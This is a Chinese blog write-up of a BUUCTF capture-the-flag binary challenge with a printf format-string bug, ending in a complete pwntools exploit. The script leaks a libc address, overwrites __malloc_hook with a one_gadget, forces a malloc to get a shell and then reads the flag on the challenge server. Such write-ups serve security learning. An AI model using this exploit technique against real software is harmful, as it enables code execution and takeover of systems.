[BUUCTF-pwn] cscctf_2019_final_babyprintf

最新推荐文章于 2022-07-26 19:25:58 发布
最新推荐文章于 2022-07-26 19:25:58 发布
阅读量221 收藏 1
点赞数 2
分类专栏: CTF pwn 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/121333645
版权

从名字看是个formatstring漏洞题,先看保护:

/buuctf/383_cscctf_2019_final_babyprintf/pwn'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

保护基本全开,formatstring用不着canary

再看题目:

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char *v3; // rax
  int i; // [rsp+Ch] [rbp-114h]
  char s[264]; // [rsp+10h] [rbp-110h] BYREF   //s在栈里就好办了
  unsigned __int64 v6; // [rsp+118h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  init();
  for ( i = 0; i <= 2; ++i )   //可以作3次
  {
    v3 = fgets(s, 256, stdin);
    printf(v3);
  }
  exit(0);   //然后是exit 是return
}

程序很短,执行3次然后exit。

一般情况下ret和got比较容易搞,直接改就行了,这里开了全保护got不可写,也不去执行ret,只能走第3个方法malloc_hook :

printf在调用输出里会先组织好串,然后再输出,这时候这个串会申请堆空间——malloc,malloc又会调用malloc_hook。这题就这么一个卡点

步骤:

  1. 泄露libc地址,计算one_gadget
  2. 修改malloc_hook
  3. 输入长串触发malloc
from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
    one = [0x4240e, 0x42462, 0xc4f7f, 0xe31fa, 0xe31ee]
    libc_start_main_ret = 0x21a87
else:
    p = remote('node4.buuoj.cn', 29367) 
    libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
    one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
    libc_start_main_ret = 0x21b97

context.log_level = 'debug'

#AAAAAAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p

offset = 8
p.sendline(b'%43$p,%42$p')
libc_base = int(p.recvuntil(b',', drop=True) ,16) - libc_start_main_ret
malloc_hook = libc_base + libc_elf.sym['__malloc_hook']
one_gadget  = libc_base + one[7]  #local 4 remote 1,3,7
print('libc:', hex(libc_base))

pwn_base = int(p.recvline()[:-1] ,16) - elf.sym['__libc_csu_init'] #no use
print('pwn:', hex(pwn_base))

sleep(0.5)
payload = fmtstr_payload(8, {malloc_hook: one_gadget})
p.sendline(payload)
sleep(1)

p.sendline(b'%100000c') #>=65505 call malloc ->malloc_hook
sleep(1)
p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
日志 7.4 pwn
RobinZZX的博客
07-04 237
写入内存操作: 使用write() puts()等有泄露内存功能的函数,通过配置合适的参数如写入地址等等来完成写入 使用pop_r1_r2; mov [r1] r2;链来向r1寄存器的值所指向的地址写入 使用pop r2; xor r1 r1; xor r1 r2; xchg r1 r3; … mov [r1] r2; 链来向r1寄存器的值所指向的地址写入 ROP Emporium ret2c...
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 395
buuctf-pwn 001-016题wp
cscctf_2019_final_childrenheap(house of orange)
seaaseesa的博客
04-30 643
cscctf_2019_final_childrenheap 首先,检查一下程序的保护机制 然后用IDA分析一下 Update功能存在一个null off by one 禁用了fastbin,因此不能fastbin attack。那么可以利用house of orange或者large bin attack,个人认为house of orange较为简单一些。 利用null ...
BUUCTF pwn 五月刷题
coco的博客
05-04 675
actf_2019_babystack 典型的stack pivot,告诉了输入时候栈的地址,我们可以通过伪造ebp,通过两次leave将esp指向开始时候的栈地址。注意的是这里system("/bin/sh")有问题,换了one gadget才成功,不是很清楚为什么。 from pwn import * context.log_level = "debug" context.terminal ...
ctf中关于文件压缩的2个web题
南迪叶先森
07-19 773
公粽号:黒掌 一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主! 1sql注入总结 [CSCCTF 2019 Final]ZlipperyStillAlive 题目下载链接 https://github.com/sturmisch/cscctf-problem/tree/master/2019/final/web/zlippery-still-alive 这个题网上没有找到具体细节的wp,而且关于go的web题比较少,这里记录一下,看看题目 看看源码,发现有2个路由,get请求的根目录,和po.
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
hctf[pwn]babyprintf_ver2
九层台
11-15 803
0x01程序分析 程序给出了data段的地址,然后允许向这个地址处输入0x1ff个字节。 这个data段到底存的是什么呢? pwndbg&gt; print $rbx + $rax $1 = 0x555555756011 pwndbg&gt; x /50xg 0x555555756011 0x555555756011: 0x7200676664647364 0x200000000000646c ...
buuoj Pwn writeup 151-155
yongbaoii的博客
05-28 371
151 ciscn_2019_sw_1 保护 要注意到的是RELRO一点没开,这意味着.fini_array是可以覆盖的。 栈上的格式化字符串。 system也有了。 printf只能用一次,但是我们前面说.fini_array可以覆盖,所以我们第一次先覆盖它为main,制造循环,然后劫持scanf的got表,进行利用就好。 要注意的是在我们覆盖.fini_array的意思是在返回的时候以此调用里面的函数,而这个题.fini_array数组只有一个数组,所以我们只能通过它来返回一次main函数,所以我们一
[BUUCTF-pwn]——qctf2018_stack2
Y_peak的博客
04-02 354
[BUUCTF-pwn]——qctf2018_stack2 这道题注意一点v3的类型就好, 其他应该木有什么可以说的吧, 它是char*类型., 也就是每个我们赋值的v7只有低位的一个字节可以写进去 漏洞就在这里, 可以利用这里, 以v3为基准修改任意地址的数据. 还有一点需要注意的是偏移, 我最一开始写的时候, 想当然写成了0x40+4 主要原因是因为画圈的位置改变了esp, 懒得看汇编往上面找了直接动态调试. 第一次执行该汇编的时候, eax就是我们开始输入的位置 然后直接定位到retn看栈顶
[BUUCTF]PWN——picoctf_2018_are you root(程序逻辑错误)
mcmuyanga的博客
03-17 462
picoctf_2018_are you root 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的情况
强网杯2021 pwn 赛题解析——babypwn
CoLin的pwn小屋
07-26 797
强网杯2021 pwn 赛题回顾——babypwn
[BUUCTF-pwn] hungman_csaw_2016
weixin_52640415的博客
12-22 150
学习的这个exp 先弄清楚流程: 先读入name然后根据大小建个堆块 建0x80的块用来管理:{4:score,4:name_len,8:ptr->name} 读入随机数跟name加密成a-z的字符,然后与输入相同则显示并加分 超score则可重写name,最长可写0xf8 明显溢出 思路: 随便写入A*26,然后从a猜到z肯定能成功 成功后写溢出,修改score=0,len=27,ptr=got.__libc_start_main在回显name时得到libc。因为后边要将got.mem
[BUUCTF]PWN——bjdctf_2020_babyrop2
mcmuyanga的博客
11-05 1223
bjdctf_2020_babyrop2 附件 步骤: 例行检查,64位程序,开启了NX和canary保护 2. 试运行一下程序,看看大概的情况 提示我们去泄露libc 3. 64位ida载入,从main函数开始看程序 init gift 第9行的printf函数存在格式化字符串漏洞,可以利用这点去泄露canary的值 vuln buf参数存在溢出漏洞,只要绕过了canary就能够利用ret2libc的方法获取shell 利用思路: 利用格式化字符串泄露出canary的值 利用溢出漏洞,
[BUUCTF-pwn] simple_calc_2016
weixin_52640415的博客
12-14 295
先看漏点: 正常情况下,5退出直接return 0或者free再return就行了,这里还有个memcpy,v29是堆指针,v26在栈内。v26的定义是rbp-40h 64位系统写8个qword就到一般rbp后边就是ret而允许写的数是0x100/2个,明显的溢出,只需要写9个然后写rop即可。 char v26[40]; // [rsp+10h] [rbp-40h] BYREF ....... case 1: adds((__int64)"%d", ...
【Writeup】BUUCTF_Web_高明的黑客
BAKUMANSEC - Just Do It
08-19 1141
0x01 解题思路   这题下载源码一看似乎有很多一句话木马,但是大多数根本没法执行命令,而且文件和参数都比较多,所以比较普遍的做法是本地搭个环境(PHP7)尝试所有的GET和POST参数。CTF Writeups给的wp:https://www.ctfwp.com/articals/2019qiangwang.html#%E9%AB%98%E6%98%8E%E7%9A%84%E9%BB%91%...
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值